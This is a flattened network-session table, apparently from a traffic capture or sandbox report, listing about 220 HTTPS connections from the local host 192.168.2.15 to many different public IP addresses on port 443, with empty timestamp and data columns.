                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10533192.168.2.1555446156.141.210.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10534192.168.2.155239264.72.240.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10535192.168.2.155903687.59.42.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10536192.168.2.1541066120.45.153.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10537192.168.2.155339879.227.207.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10538192.168.2.1555772186.173.231.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10539192.168.2.1559014220.140.121.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10540192.168.2.1538522150.210.221.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10541192.168.2.1534984217.150.73.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10542192.168.2.1555104179.14.238.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10543192.168.2.153519268.69.166.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10544192.168.2.154303647.225.119.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10545192.168.2.1546376207.166.119.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10546192.168.2.154887636.137.84.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10547192.168.2.15521784.106.8.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10548192.168.2.153762843.76.38.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10549192.168.2.1538526119.170.133.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10550192.168.2.1549562217.91.135.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10551192.168.2.154796860.252.95.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10552192.168.2.1551888181.68.247.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10553192.168.2.1560686213.212.82.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10554192.168.2.1536268185.183.233.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10555192.168.2.1544356137.134.228.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10556192.168.2.1535728221.253.16.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10557192.168.2.153820879.125.234.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10558192.168.2.154309496.183.154.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10559192.168.2.1534508140.239.241.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10560192.168.2.155215290.163.123.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10561192.168.2.1548362143.101.222.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10562192.168.2.1556416211.2.230.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10563192.168.2.155197850.72.184.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10564192.168.2.1552084157.155.93.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10565192.168.2.1549078122.14.80.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10566192.168.2.1559604208.34.103.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10567192.168.2.155919490.163.21.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10568192.168.2.1537174186.137.45.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10569192.168.2.155384891.63.180.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10570192.168.2.153421852.6.75.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10571192.168.2.1559044140.20.74.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10572192.168.2.154347846.253.207.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10573192.168.2.153683489.142.118.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10574192.168.2.1547496212.168.92.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10575192.168.2.154387299.234.169.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10576192.168.2.155606670.202.29.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10577192.168.2.1549492121.153.64.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10578192.168.2.153393899.154.23.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10579192.168.2.1553022178.217.134.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10580192.168.2.1559738186.103.123.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10581192.168.2.154693025.13.3.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10582192.168.2.153792663.140.242.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10583192.168.2.1541040211.247.173.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10584192.168.2.155079066.220.34.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10585192.168.2.1545418192.9.247.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10586192.168.2.1556914205.72.121.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10587192.168.2.1558434164.245.104.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10588192.168.2.156059098.71.92.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10589192.168.2.15380782.223.46.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10590192.168.2.154729640.245.188.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10591192.168.2.1554316125.172.236.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10592192.168.2.155953886.45.100.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10593192.168.2.1543164151.59.62.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10594192.168.2.1549412175.27.202.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10595192.168.2.1533936137.99.35.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10596192.168.2.153908875.62.223.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10597192.168.2.1546576180.113.192.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10598192.168.2.1545832167.221.156.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10599192.168.2.1542034150.95.175.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10600192.168.2.1541556125.179.116.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10601192.168.2.153727653.35.171.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10602192.168.2.155659884.253.223.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10603192.168.2.1535758142.108.243.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10604192.168.2.154543443.99.241.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10605192.168.2.154356625.221.162.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10606192.168.2.1536056107.242.184.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10607192.168.2.1557756180.224.244.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10608192.168.2.154661888.2.17.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10609192.168.2.1545068137.230.4.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10610192.168.2.1550484191.145.196.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10611192.168.2.1536778177.14.253.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10612192.168.2.153318458.224.193.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10613192.168.2.1533316158.82.179.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10614192.168.2.153863865.175.161.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10615192.168.2.1539190141.32.153.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10616192.168.2.1554914217.35.3.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10617192.168.2.1537128169.153.242.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10618192.168.2.1553500195.227.90.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10619192.168.2.155996893.98.125.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10620192.168.2.155966889.235.106.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10621192.168.2.1556906187.241.144.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10622192.168.2.15461365.210.217.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10623192.168.2.1539084148.128.109.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10624192.168.2.1545598136.141.233.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10625192.168.2.1555940207.52.59.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10626192.168.2.155888064.41.190.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10627192.168.2.154668680.21.218.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10628192.168.2.154610220.0.177.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10629192.168.2.1542348213.118.173.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10630192.168.2.153945899.241.85.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10631192.168.2.1536898171.186.23.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10632192.168.2.1546418164.18.8.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10633192.168.2.155197094.190.56.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10634192.168.2.1552490156.117.236.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10635192.168.2.154601431.52.177.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10636192.168.2.1535884174.42.135.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10637192.168.2.153367865.113.119.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10638192.168.2.1533398223.27.112.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10639192.168.2.1534834203.19.252.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10640192.168.2.155959017.114.13.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10641192.168.2.153864841.48.18.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10642192.168.2.1559488207.104.223.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10643192.168.2.155653642.65.213.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10644192.168.2.153810899.182.186.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10645192.168.2.1541620220.123.42.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10646192.168.2.1548900145.78.162.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10647192.168.2.154848479.145.54.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10648192.168.2.1558986123.171.191.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10649192.168.2.1559198140.90.184.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10650192.168.2.1556420101.166.10.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10651192.168.2.1554596114.123.101.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10652192.168.2.1544282173.102.172.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10653192.168.2.1559938109.226.37.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10654192.168.2.1544982184.225.42.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10655192.168.2.155629879.150.31.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10656192.168.2.155429249.3.118.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10657192.168.2.1558300167.116.161.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10658192.168.2.155229658.97.214.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10659192.168.2.154215467.114.197.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10660192.168.2.1546622111.28.145.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10661192.168.2.1552312195.90.37.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10662192.168.2.1552520188.25.111.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10663192.168.2.1549158207.32.116.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10664192.168.2.1556638220.174.39.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10665192.168.2.1556848136.215.54.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10666192.168.2.1554588152.90.205.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10667192.168.2.154509093.46.250.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10668192.168.2.1553800161.156.74.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10669192.168.2.1542408105.29.254.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10670192.168.2.1540896113.137.57.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10671192.168.2.1555888203.40.134.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10672192.168.2.155044858.167.202.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10673192.168.2.15542422.38.14.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10674192.168.2.154136672.241.166.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10675192.168.2.1547140105.170.17.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10676192.168.2.1555480189.111.59.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10677192.168.2.1546680156.94.55.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10678192.168.2.155264850.48.157.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10679192.168.2.1555640141.247.116.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10680192.168.2.1534388167.142.247.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10681192.168.2.153341645.255.177.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10682192.168.2.153436468.248.157.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10683192.168.2.154679494.33.200.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10684192.168.2.154343095.88.12.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10685192.168.2.155294477.253.0.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10686192.168.2.1532988160.23.41.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10687192.168.2.154296670.69.175.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10688192.168.2.154987283.26.198.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10689192.168.2.155405479.252.51.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10690192.168.2.1538584114.65.42.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10691192.168.2.1550708209.202.241.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10692192.168.2.1553468198.107.96.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10693192.168.2.1543968118.182.47.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10694192.168.2.1535038116.142.67.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10695192.168.2.1557554206.65.165.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10696192.168.2.15553344.15.251.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10697192.168.2.1556522102.57.90.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10698192.168.2.1534342172.241.130.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10699192.168.2.1548934100.214.193.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10700192.168.2.1544730195.172.15.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10701192.168.2.155094843.78.66.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10702192.168.2.1535250188.228.246.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10703192.168.2.1533316101.15.242.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10704192.168.2.1557052208.76.112.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10705192.168.2.153561625.221.137.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10706192.168.2.1534966185.135.99.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10707192.168.2.155582292.184.67.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10708192.168.2.154929071.39.178.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10709192.168.2.1533080170.62.6.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10710192.168.2.1543752134.218.218.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10711192.168.2.1555228115.213.236.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10712192.168.2.154862638.118.224.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10713192.168.2.1534296140.46.29.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10714192.168.2.1549956152.89.170.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10715192.168.2.1535504216.158.218.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10716192.168.2.155439288.9.154.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10717192.168.2.1542196179.11.183.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10718192.168.2.1550876140.24.87.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10719192.168.2.1545912101.212.181.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10720192.168.2.1557964179.30.81.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10721192.168.2.153326049.255.143.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10722192.168.2.1547910137.8.191.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10723192.168.2.1534366146.255.180.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10724192.168.2.1532846117.90.24.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10725192.168.2.156068287.11.246.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10726192.168.2.1536016175.243.38.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10727192.168.2.1544686106.93.36.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10728192.168.2.154718061.65.31.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10729192.168.2.15605181.45.94.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10730192.168.2.154312477.66.106.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10731192.168.2.155904694.5.235.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10732192.168.2.15585881.116.40.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10733192.168.2.153457812.223.82.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10734192.168.2.1558732182.87.33.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10735192.168.2.1545792186.8.248.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10736192.168.2.153843462.226.244.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10737192.168.2.1549120221.254.46.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10738192.168.2.155465252.71.233.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10739192.168.2.1543576129.160.101.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10740192.168.2.155093040.186.141.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10741192.168.2.1551374102.98.55.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10742192.168.2.1534436142.10.14.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10743192.168.2.154500681.182.229.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10744192.168.2.154732642.32.188.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10745192.168.2.1557152188.2.82.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10746192.168.2.154274891.246.208.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10747192.168.2.154319462.252.42.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10748192.168.2.1543550156.210.199.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10749192.168.2.155588419.72.181.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10750192.168.2.155767489.206.205.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10751192.168.2.1540888211.129.19.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10752192.168.2.153445678.64.184.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10753192.168.2.1550636104.131.192.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
